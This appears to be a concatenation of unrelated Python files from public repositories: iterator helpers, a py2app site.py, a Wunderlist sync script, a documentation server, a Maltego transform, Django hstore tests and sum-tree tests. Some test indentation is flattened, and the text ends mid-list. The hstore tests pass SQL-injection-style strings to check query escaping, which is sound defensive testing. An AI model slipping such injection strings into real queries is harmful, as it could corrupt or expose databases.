def grouper(iterable, n, fillvalue=None):
    """Collect data into fixed-length chunks, padding the last one.

    grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
    """
    # n references to the *same* iterator: zip_longest pulls n items per tuple.
    iterators = [iter(iterable)] * n
    return zip_longest(*iterators, fillvalue=fillvalue)
def grouper_dict(DICT, n):
    """Yield dicts of at most ``n`` items each; the last chunk may be smaller.

    Chunks the keys with ``islice`` instead of filtering out the ``None``
    fill values of ``grouper`` -- the old approach silently dropped a
    legitimate ``None`` key (and used the ``!= None`` anti-idiom).
    """
    key_iter = iter(DICT)
    while True:
        keys = list(itertools.islice(key_iter, n))
        if not keys:
            return
        yield dict((k, DICT[k]) for k in keys)
def grouper_list(LIST, n):
    """Yield lists of at most ``n`` items each; the last chunk may be smaller.

    Chunks with ``islice`` instead of stripping the ``None`` fill values of
    ``grouper`` -- the old approach silently removed legitimate ``None``
    elements from the data.
    """
    iterator = iter(LIST)
    while True:
        chunk = list(itertools.islice(iterator, n))
        if not chunk:
            return
        yield chunk
def running_windows(iterable, size):
    """Yield every run of ``size`` consecutive items as a list.

    e.g. iterable = [1,2,3,4,5], size = 3
    yields [1,2,3], [2,3,4], [3,4,5]
    """
    window = collections.deque(maxlen=size)
    for item in iterable:
        window.append(item)
        if len(window) == size:
            yield list(window)
def cycle_running_windows(iterable, size):
    """Yield ``len(iterable)`` windows of ``size`` items, wrapping around.

    e.g. iterable = [1,2,3,4,5], size = 2
    yields [1,2], [2,3], [3,4], [4,5], [5,1]

    Bug fix: the original stopped after consuming ``len(iterable)`` items, so
    the wrap-around windows promised by its docstring (e.g. ``[5,1]``) were
    never produced.  We now count *yielded windows* instead of consumed items.
    """
    length = len(iterable)
    window = collections.deque(maxlen=size)
    produced = 0
    for item in itertools.cycle(iterable):
        window.append(item)
        if len(window) == size:
            yield list(window)
            produced += 1
            if produced == length:
                break
def cycle_slice(LIST, start, end):
    """Return the right-hand (wrap-around) slice from ``start`` to ``end``, inclusive.

    e.g.
    array = [0,1,2,3,4,5,6,7,8,9]
    cycle_slice(array, 4, 7) -> [4,5,6,7]
    cycle_slice(array, 8, 2) -> [8,9,0,1,2]
    """
    # isinstance instead of ``type(...) != list``: accepts list subclasses and
    # is the idiomatic type check.
    if not isinstance(LIST, list):
        LIST = list(LIST)
    if end >= start:
        return LIST[start:end + 1]
    return LIST[start:] + LIST[:end + 1]
def padding_left_shift(array, left_shift):
    """Shift ``array`` left by ``left_shift`` slots, padding the tail with the last value.

    padding_left_shift([1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4], 1)
    [1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4] to
    [1, 1, 2, 2, 2, 2, 2, 4, 4, 4, 4]
    """
    shifted = collections.deque(array)
    pad_value = shifted[-1]
    shifted.rotate(-left_shift)
    for _ in range(left_shift):
        shifted.pop()
    shifted.extend([pad_value] * left_shift)
    return shifted
def padding_right_shift(array, right_shift):
    """Shift ``array`` right by ``right_shift`` slots, padding the head with the first value.

    padding_right_shift([1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4], 1)
    [1, 1, 1, 2, 2, 2, 2, 2, 4, 4, 4] to
    [1, 1, 1, 1, 2, 2, 2, 2, 2, 4, 4]
    """
    shifted = collections.deque(array)
    pad_value = shifted[0]
    shifted.rotate(right_shift)
    for _ in range(right_shift):
        shifted.popleft()
    shifted.extendleft([pad_value] * right_shift)
    return shifted
def count_generator(generator, memory_efficient=True):
    """Count the number of items produced by ``generator``.

    memory_efficient=True  -- constant memory, roughly 3x slower
    memory_efficient=False -- faster, but materialises every item first
    """
    if not memory_efficient:
        return len(list(generator))
    return sum(1 for _ in generator)
if __name__ == "__main__":
from angora.GADGET.pytimer import Timer
import time
import unittest
timer = Timer()
class IterToolsUnittest(unittest.TestCase):
def setUp(self):
self.iterable_generator = range(10)
self.iterable_list = list(range(10))
self.iterable_set = set(list(range(10)))
self.iterable_dict = {i: chr(j) for i, j in zip(range(1, 11), range(65, 75))}
def test_take(self):
self.assertEqual(take(5, self.iterable_generator), [0, 1, 2, 3, 4])
self.assertEqual(take(5, self.iterable_list), [0, 1, 2, 3, 4])
self.assertEqual(take(5, self.iterable_set), [0, 1, 2, 3, 4])
self.assertEqual(take(5, self.iterable_dict), [1, 2, 3, 4, 5])
def test_flatten(self):
"""测试flatten的性能, 应该要比二重循环性能好
"""
complexity = 1000
iterable = [list(range(complexity))] * complexity
timer.start()
for _ in flatten(iterable):
pass
print("fatten method takes %.6f second" % timer.stop())
timer.start()
for chunk in iterable:
for _ in chunk:
pass
print("double for loop method takes %.6f second" % timer.stop())
def test_flatten_all(self):
"""flatten_all slower, but more convenient. And you don't need to know how iterable
nested in each other.
"""
complexity = 100
iterable = [[list(range(complexity))] * complexity] * complexity
timer.start()
for _ in flatten_all(iterable):
pass
print("fatten_all method takes %.6f second" % timer.stop())
timer.start()
for chunk1 in iterable:
for chunk2 in chunk1:
for _ in chunk2:
pass
print("nested for loop method takes %.6f second" % timer.stop())
def test_nth(self):
self.assertEqual(nth(self.iterable_list, 5), 5)
def test_count_generator(self):
self.assertEqual(count_generator(self.iterable_generator), 10)
def number_generator():
for i in range(1000000):
yield i
timer.start()
count_generator(number_generator(), memory_efficient=True)
print("memory_efficient way takes %s second" % timer.stop())
timer.start()
count_generator(number_generator(), memory_efficient=False)
print("non-memory_efficient way takes %s second" % timer.stop())
unittest.main()
def test_flatten():
"""测试flatten的性能
"""
print("{:=^40}".format("test_flatten"))
complexity = 1000
a = [[1,2,3],[4,5,6],[7,8,9,10]] * complexity
st = time.clock()
for _ in flatten(a):
pass
print(time.clock() - st)
st = time.clock()
for chunk in a:
for _ in chunk:
pass
print(time.clock() - st)
# test_flatten()
def test_flatten_all():
"""测试flatten_all的性能
"""
print("{:=^40}".format("test_flatten_all"))
complexity = 1000
a = [[1,2,3],[4,[5,6],[7,8]], [9,10]] * complexity
b = range(complexity * 10)
st = time.clock()
for _ in flatten_all(a):
pass
print(time.clock() - st)
st = time.clock()
for _ in b:
pass
print(time.clock() - st)
# test_flatten_all()
def test_nth():
"""测试nth的性能
"""
print("{:=^40}".format("test_flatten_all"))
n = 10000
array = [i for i in range(n)]
st = time.clock()
for i in range(n):
_ = array[i]
print(time.clock() - st)
st = time.clock()
for i in range(n):
_ = nth(array, i)
print(time.clock() - st)
st = time.clock()
for i in array:
_ = i
print(time.clock() - st)
# test_nth()
def test_grouper():
"""Test for grouper, grouper_list, grouper_dict
"""
print("{:=^40}".format("test_grouper"))
for chunk in grouper("abcdefg",3):
print(chunk)
# test_grouper()
def test_grouper_dict_list():
"""Test for grouper_dict, grouper_list
"""
print("{:=^40}".format("test_grouper_dict_list"))
print("=== test for grouper_dict ===")
a = {key: "hello" for key in range(10)} ## test grouper_list
for chunk_d in grouper_dict(a, 3):
print(chunk_d)
print("=== test for grouper_list ===")
complexity = 1000000
timer.start()
b = range(complexity) # test grouper_dict
for chunk_l in grouper_list(b, 1000):
# print(chunk_l)
pass
timer.timeup()
timer.start()
chunk_l = list()
for i in b:
chunk_l.append(i)
if len(chunk_l) == 1000:
# print(chunk_l)
chunk_l = list()
# print(chunk_l)
timer.timeup()
# test_grouper_dict_list()
def timetest_grouper():
array = [[1,2,3] for _ in range(1000)]
def regular():
for item in array:
pass
def use_grouper():
for chunk_l in grouper_list(array, 10):
for item in chunk_l:
pass
timer.test(regular, 1000)
timer.test(use_grouper, 1000)
# timetest_grouper()
def test_running_windows():
print("{:=^40}".format("test_running_windows"))
array = [0,1,2,3,4]
print("Testing running windows")
for i in running_windows(array,3): # 测试 窗宽 = 3
print(i)
for i in running_windows(array, 1): # 测试 窗宽 = 1
print(i)
for i in running_windows(array, 0): # 测试 窗宽 = 0
print(i)
print("Testing cycle running windows")
for i in cycle_running_windows(array, 3): # 测试 窗宽 = 3
print(i)
for i in cycle_running_windows(array, 1): # 测试 窗宽 = 1
print(i)
for i in cycle_running_windows(array, 0): # 测试 窗宽 = 0
print(i)
# test_running_windows()
def test_cycle_slice():
print("{:=^40}".format("test_cycle_slice"))
array = [0,1,2,3,4,5,6,7,8,9]
print("Testing cycle slice")
print(cycle_slice(array, 3, 6) )
print(cycle_slice(array, 6, 3) )
# test_cycle_slice()
def test_padding_shift():
print("{:=^40}".format("test_padding_shift"))
array = [1,1,1,2,2,2,2,2,4,4,4]
print(padding_left_shift(array, 1))
print(padding_right_shift(array, 1))
    # test_padding_shift()
27045433039 | import sys
import pysnooper
@pysnooper.snoop()
def lengthOfLongestSubstring(s: str) -> int:
    """Return the length of the longest substring of ``s`` with no repeats."""
    longest = 0
    window = []  # current run of distinct characters, in order of appearance
    for ch in s:
        if ch in window:
            # drop everything up to and including the previous occurrence
            del window[:window.index(ch) + 1]
        window.append(ch)
        longest = max(longest, len(window))
    return longest
if __name__ == "__main__":
max_len = lengthOfLongestSubstring(sys.argv[1])
print(max_len)
| ikedaosushi/python-sandbox | pysnoozer/lengthOfLongestSubstring.py | lengthOfLongestSubstring.py | py | 504 | python | en | code | 11 | github-code | 36 |
31829434038 | """
Append module search paths for third-party packages to sys.path.
This is stripped down and customized for use in py2app applications
"""
import sys
# os is actually in the zip, so we need to do this here.
# we can't call it python24.zip because zlib is not a built-in module (!)
_libdir = '/lib/python' + sys.version[:3]
_parent = '/'.join(__file__.split('/')[:-1])
if not _parent.endswith(_libdir):
    _parent += _libdir
sys.path.append(_parent + '/site-packages.zip')
# Stuffit decompresses recursively by default, that can mess up py2app bundles,
# add the uncompressed site-packages to the path to compensate for that.
sys.path.append(_parent + '/site-packages')
import os
# Python 3 has no ``basestring``; fall back to ``str`` so the isinstance
# checks further down work on both major versions.
try:
    basestring
except NameError:
    basestring = str
def makepath(*paths):
    """Join *paths*, absolutise the result, and return (abs_dir, normcased_abs_dir)."""
    joined = os.path.join(*paths)
    absolute = os.path.abspath(joined)
    return absolute, os.path.normcase(absolute)
# Make every already-imported module's __file__ absolute, so a later
# os.chdir() cannot break tracebacks or reload().
for m in sys.modules.values():
    f = getattr(m, '__file__', None)
    if isinstance(f, basestring) and os.path.exists(f):
        m.__file__ = os.path.abspath(m.__file__)
del m
# This ensures that the initial path provided by the interpreter contains
# only absolute pathnames, even if we're running from the build directory.
L = []
_dirs_in_sys_path = {}
dir = dircase = None  # sys.path may be empty at this point
for dir in sys.path:
    # Filter out duplicate paths (on case-insensitive file systems also
    # if they only differ in case); turn relative paths into absolute
    # paths.
    dir, dircase = makepath(dir)
    if not dircase in _dirs_in_sys_path:
        L.append(dir)
        _dirs_in_sys_path[dircase] = 1
sys.path[:] = L
del dir, dircase, L
_dirs_in_sys_path = None
def _init_pathinfo():
    """Rebuild the global duplicate-detection table from the current sys.path."""
    global _dirs_in_sys_path
    _dirs_in_sys_path = d = {}
    for dir in sys.path:
        # non-existent directories are skipped, but "" (the cwd) is kept
        if dir and not os.path.isdir(dir):
            continue
        dir, dircase = makepath(dir)
        d[dircase] = 1
def addsitedir(sitedir):
    """Add ``sitedir`` to sys.path and process any *.pth files it contains."""
    global _dirs_in_sys_path
    if _dirs_in_sys_path is None:
        # called standalone: build the table now and reset it when done
        _init_pathinfo()
        reset = 1
    else:
        reset = 0
    sitedir, sitedircase = makepath(sitedir)
    if not sitedircase in _dirs_in_sys_path:
        sys.path.append(sitedir)        # Add path component
    try:
        names = os.listdir(sitedir)
    except os.error:
        return
    names.sort()
    for name in names:
        if name[-4:] == os.extsep + "pth":
            addpackage(sitedir, name)
    if reset:
        _dirs_in_sys_path = None
def addpackage(sitedir, name):
    """Process one *.pth file: append each listed directory to sys.path.

    Lines starting with '#' are comments; lines starting with 'import' are
    executed (standard .pth semantics -- inherently trusts the bundle's own
    files, as regular site.py does).
    """
    global _dirs_in_sys_path
    if _dirs_in_sys_path is None:
        _init_pathinfo()
        reset = 1
    else:
        reset = 0
    fullname = os.path.join(sitedir, name)
    try:
        f = open(fullname)
    except IOError:
        return
    while 1:
        dir = f.readline()
        if not dir:
            break
        if dir[0] == '#':
            continue
        if dir.startswith("import"):
            exec(dir)
            continue
        if dir[-1] == '\n':
            dir = dir[:-1]
        dir, dircase = makepath(sitedir, dir)
        if not dircase in _dirs_in_sys_path and os.path.exists(dir):
            sys.path.append(dir)
            _dirs_in_sys_path[dircase] = 1
    if reset:
        _dirs_in_sys_path = None
#sys.setdefaultencoding('utf-8')
#
# Run custom site specific code, if available.
#
try:
    import sitecustomize
except ImportError:
    # no sitecustomize module in the bundle -- that is fine
    pass
#
# Remove sys.setdefaultencoding() so that users cannot change the
# encoding after initialization. The test for presence is needed when
# this module is run as a script, because this code is executed twice.
#
if hasattr(sys, "setdefaultencoding"):
    del sys.setdefaultencoding
| LettError/responsiveLettering | ResponsiveLettering.glyphsPlugin/Contents/Resources/site.py | site.py | py | 3,645 | python | en | code | 152 | github-code | 36 |
def checkCompletion(access_token, client_id):
    """Mirror Wunderlist task completion into the 'wunderlist_update' sheet.

    Sheet layout (one task per row, data assumed to start at row 2):
      column A: Wunderlist task id
      column C: completion flag, stored as the strings 'TRUE' / 'FALSE'
      column E: completion date, written when a task is first seen complete

    :param access_token: Wunderlist OAuth access token
    :param client_id:    Wunderlist client id
    """
    import wunderpy2
    import pygsheets
    import datetime
    row = 2  # sheet row of the current task (row 1 presumably a header -- verify)
    gc = pygsheets.authorize()
    wks = gc.open('wunderlist_update').sheet1
    client = wunderpy2.WunderApi().get_client(access_token, client_id)
    for row_data in wks.get_all_values():
        if row_data[2] == 'TRUE':
            # Already recorded as complete; nothing to do for this row.
            row += 1
        elif row_data[2] == 'FALSE':
            task = client.get_task(task_id=row_data[0])
            # BUG FIX: the API returns a boolean, but the old code compared
            # str(bool) -- which is 'True'/'False' -- against 'TRUE'/'FALSE',
            # so neither branch ever fired: completed tasks were never written
            # back and the row counter drifted out of sync for pending ones.
            if task.get('completed'):
                today = datetime.datetime.now().date()
                wks.update_cell('C' + str(row), 'TRUE')
                wks.update_cell('E' + str(row), str(today))
            row += 1
17884032715 | import logging
import os
import types
from typing import Optional
import core.algorithms as algorithms
from features.extensions.extensionlib import BaseExtension, BaseInterface
from packages.document_server.docserver import Server
logger = logging.getLogger(__name__)
class Extension(BaseExtension):
    """Serves the bundled algorithm documentation over a local HTTP server."""
    # NOTE: the server object is created at class-definition (import) time.
    server = Server(os.path.dirname(algorithms.__file__))
    def on_load(self):
        """Log the local documentation URL and start the server."""
        logger.info(f'帮助文档服务器:http://127.0.0.1:{self.server.port}')
        self.server.run()
class Interface(BaseInterface):
    """User-facing interface that opens help documents in the embedded browser."""

    def __init__(self):
        # Id of the embedded browser used for the previous help page.  It is
        # remembered so the next page opens in the same browser widget,
        # saving memory and keeping the user's context in one place.
        self.browser_id: Optional[int] = None

    def _show_in_browser(self, url: str) -> None:
        """Open ``url`` in the right-hand embedded browser, reusing the
        previously opened browser widget when one exists."""
        browser = self.extension.extension_lib.get_interface('embedded_browser')
        if self.browser_id is None:
            self.browser_id = browser.open_url(url=url, side='right')
        else:
            self.browser_id = browser.open_url(url=url, browser_id=self.browser_id,
                                               side='right')

    def open_by_function_name(self, name: str):
        """
        Open the documentation of a ``pyminer_algorithms`` function by name.

        :param name: name of a function inside ``algorithms``; names that do
            not exist there are silently ignored.
        """
        if name in dir(algorithms):
            self.open_by_function_object(getattr(algorithms, name))

    def open_external_search_result(self, word_to_search: str):
        """
        Open an external (Bing) search for ``word_to_search``.

        NOTE(review): the word is interpolated into the URL unescaped;
        consider ``urllib.parse.quote_plus`` if queries may contain spaces
        or special characters.
        """
        self._show_in_browser('https://cn.bing.com/search?q=%s' % word_to_search)

    def open_by_function_object(self, function: types.FunctionType):
        """
        Open the help document of ``function`` in the embedded browser.

        The markdown file path mirrors the module path below the top-level
        package, e.g. a function defined in ``algorithms.linear_algebra.array``
        is served as ``linear_algebra/array.md`` by the local server.

        :param function: the function object itself (callable), not its name
        """
        # 'algorithms.linear_algebra.array' -> 'linear_algebra/array.md'
        rel_path = function.__module__.split('.', maxsplit=1)[1].replace('.', '/') + '.md'
        port = Extension.server.port
        self._show_in_browser(f'http://127.0.0.1:{port}/{rel_path}')
| pyminer/pyminer | pyminer/packages/document_server/main.py | main.py | py | 3,241 | python | en | code | 77 | github-code | 36 |
7426504454 | from maltego_trx.transform import DiscoverableTransform
from db import db
from utils import row_dict_to_conversation_email
class EmailAddressToRecievers(DiscoverableTransform):
    """
    Given a maltego.EmailAddress Entity, return the set of Emails sent by that address from the Enron dataset.
    """
    @classmethod
    def create_entities(cls, request, response):
        # Selected entity's value is the sender's e-mail address.
        email_address = request.Value
        # Transform settings are configured in the Maltego client.
        domain = request.getTransformSetting('domain')
        minSend = int(request.getTransformSetting('minSend'))
        # request.Slider caps how many results Maltego will display.
        res = db.get_recipients_by_email(email_address, domain, minSend, limit=request.Slider)
        for d in res:
            for r in d['recipients']:
                # addEntity returns the created entity; its value is unused here.
                ent = response.addEntity('maltego.EmailAddress', r)
| crest42/enron | transforms/EmailAddressToRecievers.py | EmailAddressToRecievers.py | py | 752 | python | en | code | 0 | github-code | 36 |
# -*- coding: utf-8 -*-
from django.db import connections
from django.db.models.aggregates import Count
from django.utils.unittest import TestCase
from django_orm.postgresql.hstore.functions import HstoreKeys, HstoreSlice, HstorePeek
from django_orm.postgresql.hstore.expressions import HstoreExpression
from .models import DataBag, Ref, RefsBag
class TestDictionaryField(TestCase):
    """Tests for the PostgreSQL hstore dictionary field (Python-2-era Django)."""
    def setUp(self):
        DataBag.objects.all().delete()
    def _create_bags(self):
        # Two fixture rows with two hstore keys each.
        alpha = DataBag.objects.create(name='alpha', data={'v': '1', 'v2': '3'})
        beta = DataBag.objects.create(name='beta', data={'v': '2', 'v2': '4'})
        return alpha, beta
    def _create_bitfield_bags(self):
        # create dictionaries with bits as dictionary keys (i.e. bag5 = { 'b0':'1', 'b2':'1'})
        for i in xrange(10):
            DataBag.objects.create(name='bag%d' % (i,),
                                   data=dict(('b%d' % (bit,), '1') for bit in xrange(4) if (1 << bit) & i))
    def test_empty_instantiation(self):
        bag = DataBag.objects.create(name='bag')
        self.assertTrue(isinstance(bag.data, dict))
        self.assertEqual(bag.data, {})
    def test_named_querying(self):
        alpha, beta = self._create_bags()
        instance = DataBag.objects.get(name='alpha')
        self.assertEqual(instance, alpha)
        instance = DataBag.objects.filter(name='beta')[0]
        self.assertEqual(instance, beta)
    def test_annotations(self):
        self._create_bitfield_bags()
        queryset = DataBag.objects\
                          .annotate(num_id=Count('id'))\
                          .filter(num_id=1)
        self.assertEqual(queryset[0].num_id, 1)
    def test_unicode_processing(self):
        # Round-trip non-ASCII keys/values through the hstore column.
        greets = {
            u'de': u'Gr\xfc\xdfe, Welt',
            u'en': u'hello, world',
            u'es': u'hola, ma\xf1ana',
            u'he': u'\u05e9\u05dc\u05d5\u05dd, \u05e2\u05d5\u05dc\u05dd',
            u'jp': u'\u3053\u3093\u306b\u3061\u306f\u3001\u4e16\u754c',
            u'zh': u'\u4f60\u597d\uff0c\u4e16\u754c',
        }
        DataBag.objects.create(name='multilang', data=greets)
        instance = DataBag.objects.get(name='multilang')
        self.assertEqual(greets, instance.data)
    def test_query_escaping(self):
        me = self
        def readwrite(s):
            # try create and query with potentially illegal characters in the field and dictionary key/value
            o = DataBag.objects.create(name=s, data={ s: s })
            me.assertEqual(o, DataBag.objects.get(name=s, data={ s: s }))
        readwrite('\' select')
        readwrite('% select')
        readwrite('\\\' select')
        readwrite('-- select')
        readwrite('\n select')
        readwrite('\r select')
        readwrite('* select')
    def test_replace_full_dictionary(self):
        # update() replaces the whole hstore value, not just listed keys.
        DataBag.objects.create(name='foo', data={ 'change': 'old value', 'remove': 'baz'})
        replacement = { 'change': 'new value', 'added': 'new'}
        DataBag.objects.filter(name='foo').update(data=replacement)
        instance = DataBag.objects.get(name='foo')
        self.assertEqual(replacement, instance.data)
    def test_equivalence_querying(self):
        alpha, beta = self._create_bags()
        for bag in (alpha, beta):
            data = {'v': bag.data['v'], 'v2': bag.data['v2']}
            instance = DataBag.objects.get(data=data)
            self.assertEqual(instance, bag)
            r = DataBag.objects.filter(data=data)
            self.assertEqual(len(r), 1)
            self.assertEqual(r[0], bag)
    def test_hkeys(self):
        alpha, beta = self._create_bags()
        instance = DataBag.objects.filter(id=alpha.id)
        self.assertEqual(instance.hkeys('data'), ['v', 'v2'])
        instance = DataBag.objects.filter(id=beta.id)
        self.assertEqual(instance.hkeys('data'), ['v', 'v2'])
    def test_hkeys_annotation(self):
        alpha, beta = self._create_bags()
        queryset = DataBag.objects.annotate_functions(keys=HstoreKeys("data"))
        self.assertEqual(queryset[0].keys, ['v', 'v2'])
        self.assertEqual(queryset[1].keys, ['v', 'v2'])
    def test_hpeek(self):
        alpha, beta = self._create_bags()
        queryset = DataBag.objects.filter(id=alpha.id)
        self.assertEqual(queryset.hpeek(attr='data', key='v'), '1')
        self.assertEqual(queryset.hpeek(attr='data', key='invalid'), None)
    def test_hpeek_annotation(self):
        alpha, beta = self._create_bags()
        queryset = DataBag.objects.annotate_functions(peeked=HstorePeek("data", "v"))
        self.assertEqual(queryset[0].peeked, "1")
        self.assertEqual(queryset[1].peeked, "2")
    def test_hremove(self):
        alpha, beta = self._create_bags()
        instance = DataBag.objects.get(name='alpha')
        self.assertEqual(instance.data, alpha.data)
        DataBag.objects.filter(name='alpha').hremove('data', 'v2')
        instance = DataBag.objects.get(name='alpha')
        self.assertEqual(instance.data, {'v': '1'})
        instance = DataBag.objects.get(name='beta')
        self.assertEqual(instance.data, beta.data)
        DataBag.objects.filter(name='beta').hremove('data', ['v', 'v2'])
        instance = DataBag.objects.get(name='beta')
        self.assertEqual(instance.data, {})
    def test_hslice(self):
        alpha, beta = self._create_bags()
        queryset = DataBag.objects.filter(id=alpha.id)
        self.assertEqual(queryset.hslice(attr='data', keys=['v']), {'v': '1'})
        self.assertEqual(queryset.hslice(attr='data', keys=['invalid']), {})
    def test_hslice_annotation(self):
        alpha, beta = self._create_bags()
        queryset = DataBag.objects.annotate_functions(sliced=HstoreSlice("data", ['v']))
        self.assertEqual(queryset.count(), 2)
        self.assertEqual(queryset[0].sliced, {'v': '1'})
    def test_hupdate(self):
        alpha, beta = self._create_bags()
        self.assertEqual(DataBag.objects.get(name='alpha').data, alpha.data)
        DataBag.objects.filter(name='alpha').hupdate('data', {'v2': '10', 'v3': '20'})
        self.assertEqual(DataBag.objects.get(name='alpha').data, {'v': '1', 'v2': '10', 'v3': '20'})
    def test_key_value_subset_querying(self):
        alpha, beta = self._create_bags()
        for bag in (alpha, beta):
            qs = DataBag.objects.where(
                HstoreExpression("data").contains({'v': bag.data['v']})
            )
            self.assertEqual(len(qs), 1)
            self.assertEqual(qs[0], bag)
            qs = DataBag.objects.where(
                HstoreExpression("data").contains({'v': bag.data['v'], 'v2': bag.data['v2']})
            )
            self.assertEqual(len(qs), 1)
            self.assertEqual(qs[0], bag)
    def test_multiple_key_subset_querying(self):
        alpha, beta = self._create_bags()
        for keys in (['v'], ['v', 'v2']):
            qs = DataBag.objects.where(
                HstoreExpression("data").contains(keys)
            )
            self.assertEqual(qs.count(), 2)
        for keys in (['v', 'nv'], ['n1', 'n2']):
            qs = DataBag.objects.where(
                HstoreExpression("data").contains(keys)
            )
            self.assertEqual(qs.count(), 0)
    def test_single_key_querying(self):
        alpha, beta = self._create_bags()
        for key in ('v', 'v2'):
            qs = DataBag.objects.where(HstoreExpression("data").contains(key))
            self.assertEqual(qs.count(), 2)
        for key in ('n1', 'n2'):
            qs = DataBag.objects.where(HstoreExpression("data").contains(key))
            self.assertEqual(qs.count(), 0)
    def test_nested_filtering(self):
        self._create_bitfield_bags()
        # Test cumulative successive filters for both dictionaries and other fields
        qs = DataBag.objects.all()
        self.assertEqual(10, qs.count())
        qs = qs.where(HstoreExpression("data").contains({'b0':'1'}))
        self.assertEqual(5, qs.count())
        qs = qs.where(HstoreExpression("data").contains({'b1':'1'}))
        self.assertEqual(2, qs.count())
        qs = qs.filter(name='bag3')
        self.assertEqual(1, qs.count())
    def test_aggregates(self):
        self._create_bitfield_bags()
        res = DataBag.objects.where(HstoreExpression("data").contains({'b0':'1'}))\
                             .aggregate(Count('id'))
        self.assertEqual(res['id__count'], 5)
    def test_empty_querying(self):
        bag = DataBag.objects.create(name='bag')
        self.assertTrue(DataBag.objects.get(data={}))
        self.assertTrue(DataBag.objects.filter(data={}))
        self.assertTrue(DataBag.objects.where(HstoreExpression("data").contains({})))
class TestReferencesField(TestCase):
    """Tests for the hstore references field (hstore values pointing at Ref rows)."""
    def setUp(self):
        Ref.objects.all().delete()
        RefsBag.objects.all().delete()
    def _create_bags(self):
        # Four referenced rows, split across two bags with keys '0' and '1'.
        refs = [Ref.objects.create(name=str(i)) for i in range(4)]
        alpha = RefsBag.objects.create(name='alpha', refs={'0': refs[0], '1': refs[1]})
        beta = RefsBag.objects.create(name='beta', refs={'0': refs[2], '1': refs[3]})
        return alpha, beta, refs
    def test_empty_instantiation(self):
        bag = RefsBag.objects.create(name='bag')
        self.assertTrue(isinstance(bag.refs, dict))
        self.assertEqual(bag.refs, {})
    def test_equivalence_querying(self):
        alpha, beta, refs = self._create_bags()
        for bag in (alpha, beta):
            refs = {'0': bag.refs['0'], '1': bag.refs['1']}
            self.assertEqual(RefsBag.objects.get(refs=refs), bag)
            r = RefsBag.objects.filter(refs=refs)
            self.assertEqual(len(r), 1)
            self.assertEqual(r[0], bag)
    def test_hkeys(self):
        alpha, beta, refs = self._create_bags()
        self.assertEqual(RefsBag.objects.filter(id=alpha.id).hkeys(attr='refs'), ['0', '1'])
    def test_hpeek(self):
        alpha, beta, refs = self._create_bags()
        self.assertEqual(RefsBag.objects.filter(id=alpha.id).hpeek(attr='refs', key='0'), refs[0])
        self.assertEqual(RefsBag.objects.filter(id=alpha.id).hpeek(attr='refs', key='invalid'), None)
    def test_hslice(self):
        alpha, beta, refs = self._create_bags()
        self.assertEqual(RefsBag.objects.filter(id=alpha.id).hslice(attr='refs', keys=['0']), {'0': refs[0]})
        self.assertEqual(RefsBag.objects.filter(id=alpha.id).hslice(attr='refs', keys=['invalid']), {})
    def test_empty_querying(self):
        bag = RefsBag.objects.create(name='bag')
        self.assertTrue(RefsBag.objects.get(refs={}))
        self.assertTrue(RefsBag.objects.filter(refs={}))
    # TODO: fix this test
    #def test_key_value_subset_querying(self):
    #    alpha, beta, refs = self._create_bags()
    #    for bag in (alpha, beta):
    #        qs = RefsBag.objects.where(
    #            HstoreExpression("refs").contains({'0': bag.refs['0']})
    #        )
    #        self.assertEqual(len(qs), 1)
    #        self.assertEqual(qs[0], bag)
    #        qs = RefsBag.objects.where(
    #            HstoreExpression("refs").contains({'0': bag.refs['0'], '1': bag.refs['1']})
    #        )
    #        self.assertEqual(len(qs), 1)
    #        self.assertEqual(qs[0], bag)
    def test_multiple_key_subset_querying(self):
        alpha, beta, refs = self._create_bags()
        for keys in (['0'], ['0', '1']):
            qs = RefsBag.objects.where(HstoreExpression("refs").contains(keys))
            self.assertEqual(qs.count(), 2)
        for keys in (['0', 'nv'], ['n1', 'n2']):
            qs = RefsBag.objects.where(HstoreExpression("refs").contains(keys))
            self.assertEqual(qs.count(), 0)
    def test_single_key_querying(self):
        alpha, beta, refs = self._create_bags()
        for key in ('0', '1'):
            qs = RefsBag.objects.where(HstoreExpression("refs").contains(key))
            self.assertEqual(qs.count(), 2)
        for key in ('n1', 'n2'):
            qs = RefsBag.objects.where(HstoreExpression("refs").contains(key))
            self.assertEqual(qs.count(), 0)
| cr8ivecodesmith/django-orm-extensions-save22 | tests/modeltests/pg_hstore/tests.py | tests.py | py | 12,065 | python | en | code | 0 | github-code | 36 |
22193923889 | try:
# heritage des propri�t�s du CoupledModel par domainStructure
import Core.DEVSKernel.DEVS as DEVS
except:
import sys, os
for spath in [os.pardir + os.sep + 'Lib']:
if not spath in sys.path: sys.path.append(spath)
import Core.DEVSKernel.DEVS as DEVS
#======================================================================#
class DomainStructure(DEVS.CoupledDEVS):
    """Abstract DomainStructure class.

    A coupled DEVS model extended with containers for components and
    couplings that are added or removed at run time (dynamic structure).
    """
    def __init__(self):
        """Constructor: initialise the coupled model and the dynamic containers."""
        DEVS.CoupledDEVS.__init__(self)
        self.dynamicComponentSet = []  # components added dynamically
        self.dynamicIC = []   # dynamic internal couplings
        self.dynamicEIC = []  # dynamic external input couplings
        self.dynamicEOC = []  # dynamic external output couplings
22215949702 | import pytest
from hamcrest import assert_that, equal_to
from gairl.memory.prioritized_replay_buffer import _SumTree
def test_init_valid():
    """A fresh tree has zero total priority, unit priority range and zeroed arrays."""
    # When
    tree = _SumTree(8)
    # Then
    assert_that(tree.total_priority, equal_to(0))
    assert_that(tree.priorities_range, equal_to((1, 1)))
    assert_that(tree._data, equal_to([0]*8))
    assert_that(tree._tree, equal_to([0]*15))
def test_init_capacity_not_power_2():
    """Capacity must be a power of two; anything else is rejected."""
    # When / Then
    with pytest.raises(AssertionError):
        _SumTree(10)
def test_add_not_full():
    """Adding fewer items than the capacity fills data slots left to right."""
    # Given
    tree = _SumTree(16)
    # When
    tree.add((1, 'a', 1.), 1)
    tree.add(('b', 2, 2.), 0.1)
    tree.add(195, 3)
    tree.add((3, 3., 'c'), 1)
    tree.add('d', 5)
    tree.add(19287412.214121, 0.1)
    tree.add(0, 9)
    # Then
    assert_that(tree.priorities_range, equal_to((0.1, 9)))
    assert_that(tree._max_priorities_num, equal_to(1))
    assert_that(tree._min_priorities_num, equal_to(2))
    assert_that(tree._data, equal_to([
        (1, 'a', 1.), ('b', 2, 2.), 195,
        (3, 3., 'c'), 'd', 19287412.214121, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0
    ]))
    assert_that(tree._tree, equal_to([
        19.2,
        19.2, 0,
